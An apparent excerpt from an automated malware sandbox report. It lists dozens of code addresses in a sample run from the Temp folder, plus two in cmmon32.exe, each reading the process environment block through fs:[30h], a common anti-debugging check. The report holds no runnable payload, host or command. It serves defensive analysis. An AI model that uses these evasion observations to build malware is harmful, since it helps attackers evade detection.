          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FDB40 mov eax, dword ptr fs:[00000030h]3_2_009FDB40
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8B58 mov eax, dword ptr fs:[00000030h]3_2_00AC8B58
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FDB60 mov ecx, dword ptr fs:[00000030h]3_2_009FDB60
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0849B mov eax, dword ptr fs:[00000030h]3_2_00A0849B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496 mov eax, dword ptr fs:[00000030h]3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB14FB mov eax, dword ptr fs:[00000030h]3_2_00AB14FB
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]3_2_00A76CF0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]3_2_00A76CF0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76CF0 mov eax, dword ptr fs:[00000030h]3_2_00A76CF0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8CD6 mov eax, dword ptr fs:[00000030h]3_2_00AC8CD6
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2BC2C mov eax, dword ptr fs:[00000030h]3_2_00A2BC2C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]3_2_00AC740D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]3_2_00AC740D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC740D mov eax, dword ptr fs:[00000030h]3_2_00AC740D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1C06 mov eax, dword ptr fs:[00000030h]3_2_00AB1C06
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]3_2_00A76C0A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]3_2_00A76C0A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]3_2_00A76C0A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76C0A mov eax, dword ptr fs:[00000030h]3_2_00A76C0A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1746D mov eax, dword ptr fs:[00000030h]3_2_00A1746D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477 mov eax, dword ptr fs:[00000030h]3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2AC7B mov eax, dword ptr fs:[00000030h]3_2_00A2AC7B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A44B mov eax, dword ptr fs:[00000030h]3_2_00A2A44B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h]3_2_00A8C450
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8C450 mov eax, dword ptr fs:[00000030h]3_2_00A8C450
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h]3_2_00AC05AC
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC05AC mov eax, dword ptr fs:[00000030h]3_2_00AC05AC
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A235A1 mov eax, dword ptr fs:[00000030h]3_2_00A235A1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]3_2_009F2D8A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]3_2_009F2D8A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]3_2_009F2D8A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]3_2_009F2D8A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F2D8A mov eax, dword ptr fs:[00000030h]3_2_009F2D8A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]3_2_00A21DB5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]3_2_00A21DB5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A21DB5 mov eax, dword ptr fs:[00000030h]3_2_00A21DB5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]3_2_00A22581
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]3_2_00A22581
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]3_2_00A22581
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581 mov eax, dword ptr fs:[00000030h]3_2_00A22581
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82 mov eax, dword ptr fs:[00000030h]3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2FD9B mov eax, dword ptr fs:[00000030h]3_2_00A2FD9B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2FD9B mov eax, dword ptr fs:[00000030h]3_2_00A2FD9B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A0D5E0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0D5E0 mov eax, dword ptr fs:[00000030h]3_2_00A0D5E0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]3_2_00ABFDE2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]3_2_00ABFDE2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]3_2_00ABFDE2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABFDE2 mov eax, dword ptr fs:[00000030h]3_2_00ABFDE2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA8DF1 mov eax, dword ptr fs:[00000030h]3_2_00AA8DF1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov ecx, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A76DC9 mov eax, dword ptr fs:[00000030h]3_2_00A76DC9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A7A537 mov eax, dword ptr fs:[00000030h]3_2_00A7A537
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABE539 mov eax, dword ptr fs:[00000030h]3_2_00ABE539
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A03D34 mov eax, dword ptr fs:[00000030h]3_2_00A03D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8D34 mov eax, dword ptr fs:[00000030h]3_2_00AC8D34
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h]3_2_00A24D3B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h]3_2_00A24D3B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A24D3B mov eax, dword ptr fs:[00000030h]3_2_00A24D3B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FAD30 mov eax, dword ptr fs:[00000030h]3_2_009FAD30
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1C577 mov eax, dword ptr fs:[00000030h]3_2_00A1C577
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1C577 mov eax, dword ptr fs:[00000030h]3_2_00A1C577
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A33D43 mov eax, dword ptr fs:[00000030h]3_2_00A33D43
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A73540 mov eax, dword ptr fs:[00000030h]3_2_00A73540
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA3D40 mov eax, dword ptr fs:[00000030h]3_2_00AA3D40
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A17D50 mov eax, dword ptr fs:[00000030h]3_2_00A17D50
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A746A7 mov eax, dword ptr fs:[00000030h]3_2_00A746A7
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]3_2_00AC0EA5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]3_2_00AC0EA5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC0EA5 mov eax, dword ptr fs:[00000030h]3_2_00AC0EA5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8FE87 mov eax, dword ptr fs:[00000030h]3_2_00A8FE87
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A216E0 mov ecx, dword ptr fs:[00000030h]3_2_00A216E0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A076E2 mov eax, dword ptr fs:[00000030h]3_2_00A076E2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A38EC7 mov eax, dword ptr fs:[00000030h]3_2_00A38EC7
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAFEC0 mov eax, dword ptr fs:[00000030h]3_2_00AAFEC0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A236CC mov eax, dword ptr fs:[00000030h]3_2_00A236CC
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8ED6 mov eax, dword ptr fs:[00000030h]3_2_00AC8ED6
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAFE3F mov eax, dword ptr fs:[00000030h]3_2_00AAFE3F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]3_2_009FC600
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]3_2_009FC600
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FC600 mov eax, dword ptr fs:[00000030h]3_2_009FC600
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A28E00 mov eax, dword ptr fs:[00000030h]3_2_00A28E00
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1608 mov eax, dword ptr fs:[00000030h]3_2_00AB1608
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A61C mov eax, dword ptr fs:[00000030h]3_2_00A2A61C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A61C mov eax, dword ptr fs:[00000030h]3_2_00A2A61C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FE620 mov eax, dword ptr fs:[00000030h]3_2_009FE620
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0766D mov eax, dword ptr fs:[00000030h]3_2_00A0766D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]3_2_00A1AE73
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]3_2_00A1AE73
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]3_2_00A1AE73
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]3_2_00A1AE73
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AE73 mov eax, dword ptr fs:[00000030h]3_2_00A1AE73
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A07E41 mov eax, dword ptr fs:[00000030h]3_2_00A07E41
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABAE44 mov eax, dword ptr fs:[00000030h]3_2_00ABAE44
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABAE44 mov eax, dword ptr fs:[00000030h]3_2_00ABAE44
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h]3_2_00A77794
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h]3_2_00A77794
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A77794 mov eax, dword ptr fs:[00000030h]3_2_00A77794
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A08794 mov eax, dword ptr fs:[00000030h]3_2_00A08794
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A337F5 mov eax, dword ptr fs:[00000030h]3_2_00A337F5
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2E730 mov eax, dword ptr fs:[00000030h]3_2_00A2E730
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B73D mov eax, dword ptr fs:[00000030h]3_2_00A1B73D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B73D mov eax, dword ptr fs:[00000030h]3_2_00A1B73D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC070D mov eax, dword ptr fs:[00000030h]3_2_00AC070D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC070D mov eax, dword ptr fs:[00000030h]3_2_00AC070D
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A70E mov eax, dword ptr fs:[00000030h]3_2_00A2A70E
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2A70E mov eax, dword ptr fs:[00000030h]3_2_00A2A70E
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F4F2E mov eax, dword ptr fs:[00000030h]3_2_009F4F2E
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F4F2E mov eax, dword ptr fs:[00000030h]3_2_009F4F2E
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1F716 mov eax, dword ptr fs:[00000030h]3_2_00A1F716
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8FF10 mov eax, dword ptr fs:[00000030h]3_2_00A8FF10
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A8FF10 mov eax, dword ptr fs:[00000030h]3_2_00A8FF10
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0FF60 mov eax, dword ptr fs:[00000030h]3_2_00A0FF60
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC8F6A mov eax, dword ptr fs:[00000030h]3_2_00AC8F6A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0EF40 mov eax, dword ptr fs:[00000030h]3_2_00A0EF40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0457C450 mov eax, dword ptr fs:[00000030h]5_2_0457C450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0457C450 mov eax, dword ptr fs:[00000030h]5_2_0457C450
